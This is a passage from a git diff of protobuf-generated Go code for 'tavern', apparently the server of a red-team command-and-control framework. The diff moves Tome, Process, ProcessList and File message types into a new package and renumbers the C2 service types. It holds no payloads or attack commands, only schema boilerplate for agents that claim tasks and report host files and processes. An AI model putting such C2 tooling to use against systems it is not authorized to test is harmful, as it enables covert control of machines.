0x2e, 0x50, 0x72, + 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x04, 0x6c, 0x69, 0x73, 0x74, 0x22, + 0x1b, 0x0a, 0x19, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, + 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x41, 0x0a, 0x17, + 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, + 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x26, 0x0a, 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, + 0x74, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0e, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, + 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x22, + 0x1a, 0x0a, 0x18, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, + 0x70, 0x75, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x32, 0xea, 0x02, 0x0a, 0x02, + 0x43, 0x32, 0x12, 0x3d, 0x0a, 0x0a, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, + 0x12, 0x15, 0x2e, 0x63, 0x32, 0x2e, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, + 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x16, 0x2e, 0x63, 0x32, 0x2e, 0x43, 0x6c, 0x61, + 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, + 0x00, 0x12, 0x43, 0x0a, 0x0c, 0x44, 0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x46, 0x69, 0x6c, + 0x65, 0x12, 0x17, 0x2e, 0x63, 0x32, 0x2e, 0x44, 0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x46, + 0x69, 0x6c, 0x65, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x18, 0x2e, 0x63, 0x32, 0x2e, + 0x44, 0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x73, 0x70, + 0x6f, 0x6e, 0x73, 0x65, 0x30, 0x01, 0x12, 0x3d, 0x0a, 0x0a, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, + 0x46, 0x69, 0x6c, 0x65, 0x12, 0x15, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, + 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x16, 0x2e, 0x63, 0x32, + 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x73, 0x70, 0x6f, + 0x6e, 0x73, 0x65, 0x28, 0x01, 0x12, 0x50, 0x0a, 0x11, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, + 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x12, 0x1c, 0x2e, 0x63, 0x32, 0x2e, + 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, + 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x1d, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, + 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, + 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, 0x4f, 0x0a, 0x10, 0x52, 0x65, 0x70, 0x6f, 0x72, + 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, 0x1b, 0x2e, 0x63, 0x32, + 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, + 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x1c, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, + 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, + 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x00, 0x42, 0x23, 0x5a, 0x21, 0x72, 0x65, 0x61, 0x6c, + 0x6d, 0x2e, 0x70, 0x75, 0x62, 0x2f, 0x74, 0x61, 0x76, 0x65, 0x72, 0x6e, 0x2f, 0x69, 0x6e, 0x74, + 0x65, 0x72, 0x6e, 0x61, 0x6c, 0x2f, 0x63, 0x32, 0x2f, 0x63, 0x32, 0x70, 0x62, 0x62, 0x06, 0x70, + 0x72, 0x6f, 0x74, 0x6f, 0x33, } var ( @@ -1368,54 +1062,54 @@ func file_c2_proto_rawDescGZIP() []byte { return file_c2_proto_rawDescData } -var file_c2_proto_enumTypes = make([]protoimpl.EnumInfo, 2) -var file_c2_proto_msgTypes = make([]protoimpl.MessageInfo, 18) +var file_c2_proto_enumTypes = make([]protoimpl.EnumInfo, 1) +var file_c2_proto_msgTypes = make([]protoimpl.MessageInfo, 16) var file_c2_proto_goTypes = []interface{}{ (Host_Platform)(0), // 0: c2.Host.Platform - (Process_Status)(0), // 1: c2.Process.Status - (*Agent)(nil), // 2: c2.Agent - (*Beacon)(nil), // 3: c2.Beacon - (*Host)(nil), // 4: c2.Host - (*Process)(nil), // 5: c2.Process - (*Task)(nil), // 6: c2.Task - (*TaskError)(nil), // 7: c2.TaskError - (*TaskOutput)(nil), // 8: c2.TaskOutput - (*ClaimTasksRequest)(nil), // 9: c2.ClaimTasksRequest - (*ClaimTasksResponse)(nil), // 10: c2.ClaimTasksResponse - (*DownloadFileRequest)(nil), // 11: c2.DownloadFileRequest - (*DownloadFileResponse)(nil), // 12: c2.DownloadFileResponse - (*ReportFileRequest)(nil), // 13: c2.ReportFileRequest - (*ReportFileResponse)(nil), // 14: c2.ReportFileResponse - (*ReportProcessListRequest)(nil), // 15: c2.ReportProcessListRequest - (*ReportProcessListResponse)(nil), // 16: c2.ReportProcessListResponse - (*ReportTaskOutputRequest)(nil), // 17: c2.ReportTaskOutputRequest - (*ReportTaskOutputResponse)(nil), // 18: c2.ReportTaskOutputResponse - nil, // 19: c2.Task.ParametersEntry - (*timestamp.Timestamp)(nil), // 20: google.protobuf.Timestamp + (*Agent)(nil), // 1: c2.Agent + (*Beacon)(nil), // 2: c2.Beacon + (*Host)(nil), // 3: c2.Host + (*Task)(nil), // 4: c2.Task + (*TaskError)(nil), // 5: c2.TaskError + (*TaskOutput)(nil), // 6: c2.TaskOutput + (*ClaimTasksRequest)(nil), // 7: c2.ClaimTasksRequest + (*ClaimTasksResponse)(nil), // 8: c2.ClaimTasksResponse + (*DownloadFileRequest)(nil), // 9: c2.DownloadFileRequest + (*DownloadFileResponse)(nil), // 10: c2.DownloadFileResponse + (*ReportFileRequest)(nil), // 11: c2.ReportFileRequest + (*ReportFileResponse)(nil), // 12: c2.ReportFileResponse + (*ReportProcessListRequest)(nil), // 13: c2.ReportProcessListRequest + (*ReportProcessListResponse)(nil), // 14: c2.ReportProcessListResponse + (*ReportTaskOutputRequest)(nil), // 15: c2.ReportTaskOutputRequest + (*ReportTaskOutputResponse)(nil), // 16: c2.ReportTaskOutputResponse + (*epb.Tome)(nil), // 17: eldritch.Tome + (*timestamp.Timestamp)(nil), // 18: google.protobuf.Timestamp + (*epb.File)(nil), // 19: eldritch.File + (*epb.ProcessList)(nil), // 20: eldritch.ProcessList } var file_c2_proto_depIdxs = []int32{ - 4, // 0: c2.Beacon.host:type_name -> c2.Host - 2, // 1: c2.Beacon.agent:type_name -> c2.Agent + 3, // 0: c2.Beacon.host:type_name -> c2.Host + 1, // 1: c2.Beacon.agent:type_name -> c2.Agent 0, // 2: c2.Host.platform:type_name -> c2.Host.Platform - 1, // 3: c2.Process.status:type_name -> c2.Process.Status - 19, // 4: c2.Task.parameters:type_name -> c2.Task.ParametersEntry - 7, // 5: c2.TaskOutput.error:type_name -> c2.TaskError - 20, // 6: c2.TaskOutput.exec_started_at:type_name -> google.protobuf.Timestamp - 20, // 7: c2.TaskOutput.exec_finished_at:type_name -> google.protobuf.Timestamp - 3, // 8: c2.ClaimTasksRequest.beacon:type_name -> c2.Beacon - 6, // 9: c2.ClaimTasksResponse.tasks:type_name -> c2.Task - 5, // 10: c2.ReportProcessListRequest.list:type_name -> c2.Process - 8, // 11: c2.ReportTaskOutputRequest.output:type_name -> c2.TaskOutput - 9, // 12: c2.C2.ClaimTasks:input_type -> c2.ClaimTasksRequest - 11, // 13: c2.C2.DownloadFile:input_type -> c2.DownloadFileRequest - 13, // 14: c2.C2.ReportFile:input_type -> c2.ReportFileRequest - 15, // 15: c2.C2.ReportProcessList:input_type -> c2.ReportProcessListRequest - 17, // 16: c2.C2.ReportTaskOutput:input_type -> c2.ReportTaskOutputRequest - 10, // 17: c2.C2.ClaimTasks:output_type -> c2.ClaimTasksResponse - 12, // 18: c2.C2.DownloadFile:output_type -> c2.DownloadFileResponse - 14, // 19: c2.C2.ReportFile:output_type -> c2.ReportFileResponse - 16, // 20: c2.C2.ReportProcessList:output_type -> c2.ReportProcessListResponse - 18, // 21: c2.C2.ReportTaskOutput:output_type -> c2.ReportTaskOutputResponse + 17, // 3: c2.Task.tome:type_name -> eldritch.Tome + 5, // 4: c2.TaskOutput.error:type_name -> c2.TaskError + 18, // 5: c2.TaskOutput.exec_started_at:type_name -> google.protobuf.Timestamp + 18, // 6: c2.TaskOutput.exec_finished_at:type_name -> google.protobuf.Timestamp + 2, // 7: c2.ClaimTasksRequest.beacon:type_name -> c2.Beacon + 4, // 8: c2.ClaimTasksResponse.tasks:type_name -> c2.Task + 19, // 9: c2.ReportFileRequest.chunk:type_name -> eldritch.File + 20, // 10: c2.ReportProcessListRequest.list:type_name -> eldritch.ProcessList + 6, // 11: c2.ReportTaskOutputRequest.output:type_name -> c2.TaskOutput + 7, // 12: c2.C2.ClaimTasks:input_type -> c2.ClaimTasksRequest + 9, // 13: c2.C2.DownloadFile:input_type -> c2.DownloadFileRequest + 11, // 14: c2.C2.ReportFile:input_type -> c2.ReportFileRequest + 13, // 15: c2.C2.ReportProcessList:input_type -> c2.ReportProcessListRequest + 15, // 16: c2.C2.ReportTaskOutput:input_type -> c2.ReportTaskOutputRequest + 8, // 17: c2.C2.ClaimTasks:output_type -> c2.ClaimTasksResponse + 10, // 18: c2.C2.DownloadFile:output_type -> c2.DownloadFileResponse + 12, // 19: c2.C2.ReportFile:output_type -> c2.ReportFileResponse + 14, // 20: c2.C2.ReportProcessList:output_type -> c2.ReportProcessListResponse + 16, // 21: c2.C2.ReportTaskOutput:output_type -> c2.ReportTaskOutputResponse 17, // [17:22] is the sub-list for method output_type 12, // [12:17] is the sub-list for method input_type 12, // [12:12] is the sub-list for extension type_name @@ -1466,18 +1160,6 @@ func file_c2_proto_init() { } } file_c2_proto_msgTypes[3].Exporter = func(v interface{}, i int) interface{} { - switch v := v.(*Process); i { - case 0: - return &v.state - case 1: - return &v.sizeCache - case 2: - return &v.unknownFields - default: - return nil - } - } - file_c2_proto_msgTypes[4].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*Task); i { case 0: return &v.state @@ -1489,7 +1171,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[5].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[4].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*TaskError); i { case 0: return &v.state @@ -1501,7 +1183,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[6].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[5].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*TaskOutput); i { case 0: return &v.state @@ -1513,7 +1195,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[7].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[6].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*ClaimTasksRequest); i { case 0: return &v.state @@ -1525,7 +1207,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[8].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[7].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*ClaimTasksResponse); i { case 0: return &v.state @@ -1537,7 +1219,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[9].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[8].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*DownloadFileRequest); i { case 0: return &v.state @@ -1549,7 +1231,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[10].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[9].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*DownloadFileResponse); i { case 0: return &v.state @@ -1561,7 +1243,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[11].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[10].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*ReportFileRequest); i { case 0: return &v.state @@ -1573,7 +1255,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[12].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[11].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*ReportFileResponse); i { case 0: return &v.state @@ -1585,7 +1267,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[13].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[12].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*ReportProcessListRequest); i { case 0: return &v.state @@ -1597,7 +1279,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[14].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[13].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*ReportProcessListResponse); i { case 0: return &v.state @@ -1609,7 +1291,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[15].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[14].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*ReportTaskOutputRequest); i { case 0: return &v.state @@ -1621,7 +1303,7 @@ func file_c2_proto_init() { return nil } } - file_c2_proto_msgTypes[16].Exporter = func(v interface{}, i int) interface{} { + file_c2_proto_msgTypes[15].Exporter = func(v interface{}, i int) interface{} { switch v := v.(*ReportTaskOutputResponse); i { case 0: return &v.state @@ -1639,8 +1321,8 @@ func file_c2_proto_init() { File: protoimpl.DescBuilder{ GoPackagePath: reflect.TypeOf(x{}).PkgPath(), RawDescriptor: file_c2_proto_rawDesc, - NumEnums: 2, - NumMessages: 18, + NumEnums: 1, + NumMessages: 16, NumExtensions: 0, NumServices: 1, }, diff --git a/tavern/internal/c2/c2test/ent.go b/tavern/internal/c2/c2test/ent.go index eb61f26a6..14fb1e559 100644 --- a/tavern/internal/c2/c2test/ent.go +++ b/tavern/internal/c2/c2test/ent.go @@ -9,6 +9,7 @@ import ( "github.com/stretchr/testify/require" "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent" "realm.pub/tavern/internal/ent/beacon" "realm.pub/tavern/internal/ent/file" @@ -61,13 +62,15 @@ func ConvertTaskToC2PB(t *testing.T, ctx context.Context, task *ent.Task) *c2pb. return &c2pb.Task{ Id: int64(task.ID), - Eldritch: task. - QueryQuest(). - QueryTome(). - OnlyX(ctx). - Eldritch, - Parameters: params, - FileNames: fileNames, + Tome: &epb.Tome{ + Eldritch: task. + QueryQuest(). + QueryTome(). + OnlyX(ctx). + Eldritch, + Parameters: params, + FileNames: fileNames, + }, QuestName: task. QueryQuest(). OnlyX(ctx). diff --git a/tavern/internal/c2/epb/eldritch.pb.go b/tavern/internal/c2/epb/eldritch.pb.go new file mode 100644 index 000000000..709cff9e0 --- /dev/null +++ b/tavern/internal/c2/epb/eldritch.pb.go @@ -0,0 +1,602 @@ +// Code generated by protoc-gen-go. DO NOT EDIT. +// versions: +// protoc-gen-go v1.28.1 +// protoc v3.6.1 +// source: eldritch.proto + +package epb + +import ( + protoreflect "google.golang.org/protobuf/reflect/protoreflect" + protoimpl "google.golang.org/protobuf/runtime/protoimpl" + reflect "reflect" + sync "sync" +) + +const ( + // Verify that this generated code is sufficiently up-to-date. + _ = protoimpl.EnforceVersion(20 - protoimpl.MinVersion) + // Verify that runtime/protoimpl is sufficiently up-to-date. + _ = protoimpl.EnforceVersion(protoimpl.MaxVersion - 20) +) + +type Process_Status int32 + +const ( + Process_STATUS_UNSPECIFIED Process_Status = 0 + Process_STATUS_UNKNOWN Process_Status = 1 + Process_STATUS_IDLE Process_Status = 2 + Process_STATUS_RUN Process_Status = 3 + Process_STATUS_SLEEP Process_Status = 4 + Process_STATUS_STOP Process_Status = 5 + Process_STATUS_ZOMBIE Process_Status = 6 + Process_STATUS_TRACING Process_Status = 7 + Process_STATUS_DEAD Process_Status = 8 + Process_STATUS_WAKE_KILL Process_Status = 9 + Process_STATUS_WAKING Process_Status = 10 + Process_STATUS_PARKED Process_Status = 11 + Process_STATUS_LOCK_BLOCKED Process_Status = 12 + Process_STATUS_UNINTERUPTIBLE_DISK_SLEEP Process_Status = 13 +) + +// Enum value maps for Process_Status. +var ( + Process_Status_name = map[int32]string{ + 0: "STATUS_UNSPECIFIED", + 1: "STATUS_UNKNOWN", + 2: "STATUS_IDLE", + 3: "STATUS_RUN", + 4: "STATUS_SLEEP", + 5: "STATUS_STOP", + 6: "STATUS_ZOMBIE", + 7: "STATUS_TRACING", + 8: "STATUS_DEAD", + 9: "STATUS_WAKE_KILL", + 10: "STATUS_WAKING", + 11: "STATUS_PARKED", + 12: "STATUS_LOCK_BLOCKED", + 13: "STATUS_UNINTERUPTIBLE_DISK_SLEEP", + } + Process_Status_value = map[string]int32{ + "STATUS_UNSPECIFIED": 0, + "STATUS_UNKNOWN": 1, + "STATUS_IDLE": 2, + "STATUS_RUN": 3, + "STATUS_SLEEP": 4, + "STATUS_STOP": 5, + "STATUS_ZOMBIE": 6, + "STATUS_TRACING": 7, + "STATUS_DEAD": 8, + "STATUS_WAKE_KILL": 9, + "STATUS_WAKING": 10, + "STATUS_PARKED": 11, + "STATUS_LOCK_BLOCKED": 12, + "STATUS_UNINTERUPTIBLE_DISK_SLEEP": 13, + } +) + +func (x Process_Status) Enum() *Process_Status { + p := new(Process_Status) + *p = x + return p +} + +func (x Process_Status) String() string { + return protoimpl.X.EnumStringOf(x.Descriptor(), protoreflect.EnumNumber(x)) +} + +func (Process_Status) Descriptor() protoreflect.EnumDescriptor { + return file_eldritch_proto_enumTypes[0].Descriptor() +} + +func (Process_Status) Type() protoreflect.EnumType { + return &file_eldritch_proto_enumTypes[0] +} + +func (x Process_Status) Number() protoreflect.EnumNumber { + return protoreflect.EnumNumber(x) +} + +// Deprecated: Use Process_Status.Descriptor instead. +func (Process_Status) EnumDescriptor() ([]byte, []int) { + return file_eldritch_proto_rawDescGZIP(), []int{1, 0} +} + +// Tome for eldritch to execute. +type Tome struct { + state protoimpl.MessageState + sizeCache protoimpl.SizeCache + unknownFields protoimpl.UnknownFields + + Eldritch string `protobuf:"bytes,1,opt,name=eldritch,proto3" json:"eldritch,omitempty"` + Parameters map[string]string `protobuf:"bytes,2,rep,name=parameters,proto3" json:"parameters,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"` + FileNames []string `protobuf:"bytes,3,rep,name=file_names,json=fileNames,proto3" json:"file_names,omitempty"` +} + +func (x *Tome) Reset() { + *x = Tome{} + if protoimpl.UnsafeEnabled { + mi := &file_eldritch_proto_msgTypes[0] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) + } +} + +func (x *Tome) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*Tome) ProtoMessage() {} + +func (x *Tome) ProtoReflect() protoreflect.Message { + mi := &file_eldritch_proto_msgTypes[0] + if protoimpl.UnsafeEnabled && x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use Tome.ProtoReflect.Descriptor instead. +func (*Tome) Descriptor() ([]byte, []int) { + return file_eldritch_proto_rawDescGZIP(), []int{0} +} + +func (x *Tome) GetEldritch() string { + if x != nil { + return x.Eldritch + } + return "" +} + +func (x *Tome) GetParameters() map[string]string { + if x != nil { + return x.Parameters + } + return nil +} + +func (x *Tome) GetFileNames() []string { + if x != nil { + return x.FileNames + } + return nil +} + +// Process running on the host system. +type Process struct { + state protoimpl.MessageState + sizeCache protoimpl.SizeCache + unknownFields protoimpl.UnknownFields + + Pid uint64 `protobuf:"varint,1,opt,name=pid,proto3" json:"pid,omitempty"` + Ppid uint64 `protobuf:"varint,2,opt,name=ppid,proto3" json:"ppid,omitempty"` + Name string `protobuf:"bytes,3,opt,name=name,proto3" json:"name,omitempty"` + Principal string `protobuf:"bytes,4,opt,name=principal,proto3" json:"principal,omitempty"` + Path string `protobuf:"bytes,5,opt,name=path,proto3" json:"path,omitempty"` + Cmd string `protobuf:"bytes,6,opt,name=cmd,proto3" json:"cmd,omitempty"` + Env string `protobuf:"bytes,7,opt,name=env,proto3" json:"env,omitempty"` + Cwd string `protobuf:"bytes,8,opt,name=cwd,proto3" json:"cwd,omitempty"` + Status Process_Status `protobuf:"varint,9,opt,name=status,proto3,enum=eldritch.Process_Status" json:"status,omitempty"` +} + +func (x *Process) Reset() { + *x = Process{} + if protoimpl.UnsafeEnabled { + mi := &file_eldritch_proto_msgTypes[1] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) + } +} + +func (x *Process) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*Process) ProtoMessage() {} + +func (x *Process) ProtoReflect() protoreflect.Message { + mi := &file_eldritch_proto_msgTypes[1] + if protoimpl.UnsafeEnabled && x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use Process.ProtoReflect.Descriptor instead. +func (*Process) Descriptor() ([]byte, []int) { + return file_eldritch_proto_rawDescGZIP(), []int{1} +} + +func (x *Process) GetPid() uint64 { + if x != nil { + return x.Pid + } + return 0 +} + +func (x *Process) GetPpid() uint64 { + if x != nil { + return x.Ppid + } + return 0 +} + +func (x *Process) GetName() string { + if x != nil { + return x.Name + } + return "" +} + +func (x *Process) GetPrincipal() string { + if x != nil { + return x.Principal + } + return "" +} + +func (x *Process) GetPath() string { + if x != nil { + return x.Path + } + return "" +} + +func (x *Process) GetCmd() string { + if x != nil { + return x.Cmd + } + return "" +} + +func (x *Process) GetEnv() string { + if x != nil { + return x.Env + } + return "" +} + +func (x *Process) GetCwd() string { + if x != nil { + return x.Cwd + } + return "" +} + +func (x *Process) GetStatus() Process_Status { + if x != nil { + return x.Status + } + return Process_STATUS_UNSPECIFIED +} + +// ProcessList of running processes on the host system. +type ProcessList struct { + state protoimpl.MessageState + sizeCache protoimpl.SizeCache + unknownFields protoimpl.UnknownFields + + List []*Process `protobuf:"bytes,1,rep,name=list,proto3" json:"list,omitempty"` +} + +func (x *ProcessList) Reset() { + *x = ProcessList{} + if protoimpl.UnsafeEnabled { + mi := &file_eldritch_proto_msgTypes[2] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) + } +} + +func (x *ProcessList) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*ProcessList) ProtoMessage() {} + +func (x *ProcessList) ProtoReflect() protoreflect.Message { + mi := &file_eldritch_proto_msgTypes[2] + if protoimpl.UnsafeEnabled && x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use ProcessList.ProtoReflect.Descriptor instead. +func (*ProcessList) Descriptor() ([]byte, []int) { + return file_eldritch_proto_rawDescGZIP(), []int{2} +} + +func (x *ProcessList) GetList() []*Process { + if x != nil { + return x.List + } + return nil +} + +// File on the host system. +type File struct { + state protoimpl.MessageState + sizeCache protoimpl.SizeCache + unknownFields protoimpl.UnknownFields + + Path string `protobuf:"bytes,1,opt,name=path,proto3" json:"path,omitempty"` + Owner string `protobuf:"bytes,2,opt,name=owner,proto3" json:"owner,omitempty"` + Group string `protobuf:"bytes,3,opt,name=group,proto3" json:"group,omitempty"` + Permissions string `protobuf:"bytes,4,opt,name=permissions,proto3" json:"permissions,omitempty"` + Size int64 `protobuf:"varint,5,opt,name=size,proto3" json:"size,omitempty"` + Sha3_256Hash string `protobuf:"bytes,6,opt,name=sha3_256_hash,json=sha3256Hash,proto3" json:"sha3_256_hash,omitempty"` + Chunk []byte `protobuf:"bytes,7,opt,name=chunk,proto3" json:"chunk,omitempty"` +} + +func (x *File) Reset() { + *x = File{} + if protoimpl.UnsafeEnabled { + mi := &file_eldritch_proto_msgTypes[3] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) + } +} + +func (x *File) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*File) ProtoMessage() {} + +func (x *File) ProtoReflect() protoreflect.Message { + mi := &file_eldritch_proto_msgTypes[3] + if protoimpl.UnsafeEnabled && x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use File.ProtoReflect.Descriptor instead. +func (*File) Descriptor() ([]byte, []int) { + return file_eldritch_proto_rawDescGZIP(), []int{3} +} + +func (x *File) GetPath() string { + if x != nil { + return x.Path + } + return "" +} + +func (x *File) GetOwner() string { + if x != nil { + return x.Owner + } + return "" +} + +func (x *File) GetGroup() string { + if x != nil { + return x.Group + } + return "" +} + +func (x *File) GetPermissions() string { + if x != nil { + return x.Permissions + } + return "" +} + +func (x *File) GetSize() int64 { + if x != nil { + return x.Size + } + return 0 +} + +func (x *File) GetSha3_256Hash() string { + if x != nil { + return x.Sha3_256Hash + } + return "" +} + +func (x *File) GetChunk() []byte { + if x != nil { + return x.Chunk + } + return nil +} + +var File_eldritch_proto protoreflect.FileDescriptor + +var file_eldritch_proto_rawDesc = []byte{ + 0x0a, 0x0e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, + 0x12, 0x08, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x22, 0xc0, 0x01, 0x0a, 0x04, 0x54, + 0x6f, 0x6d, 0x65, 0x12, 0x1a, 0x0a, 0x08, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x18, + 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x08, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x12, + 0x3e, 0x0a, 0x0a, 0x70, 0x61, 0x72, 0x61, 0x6d, 0x65, 0x74, 0x65, 0x72, 0x73, 0x18, 0x02, 0x20, + 0x03, 0x28, 0x0b, 0x32, 0x1e, 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x54, + 0x6f, 0x6d, 0x65, 0x2e, 0x50, 0x61, 0x72, 0x61, 0x6d, 0x65, 0x74, 0x65, 0x72, 0x73, 0x45, 0x6e, + 0x74, 0x72, 0x79, 0x52, 0x0a, 0x70, 0x61, 0x72, 0x61, 0x6d, 0x65, 0x74, 0x65, 0x72, 0x73, 0x12, + 0x1d, 0x0a, 0x0a, 0x66, 0x69, 0x6c, 0x65, 0x5f, 0x6e, 0x61, 0x6d, 0x65, 0x73, 0x18, 0x03, 0x20, + 0x03, 0x28, 0x09, 0x52, 0x09, 0x66, 0x69, 0x6c, 0x65, 0x4e, 0x61, 0x6d, 0x65, 0x73, 0x1a, 0x3d, + 0x0a, 0x0f, 0x50, 0x61, 0x72, 0x61, 0x6d, 0x65, 0x74, 0x65, 0x72, 0x73, 0x45, 0x6e, 0x74, 0x72, + 0x79, 0x12, 0x10, 0x0a, 0x03, 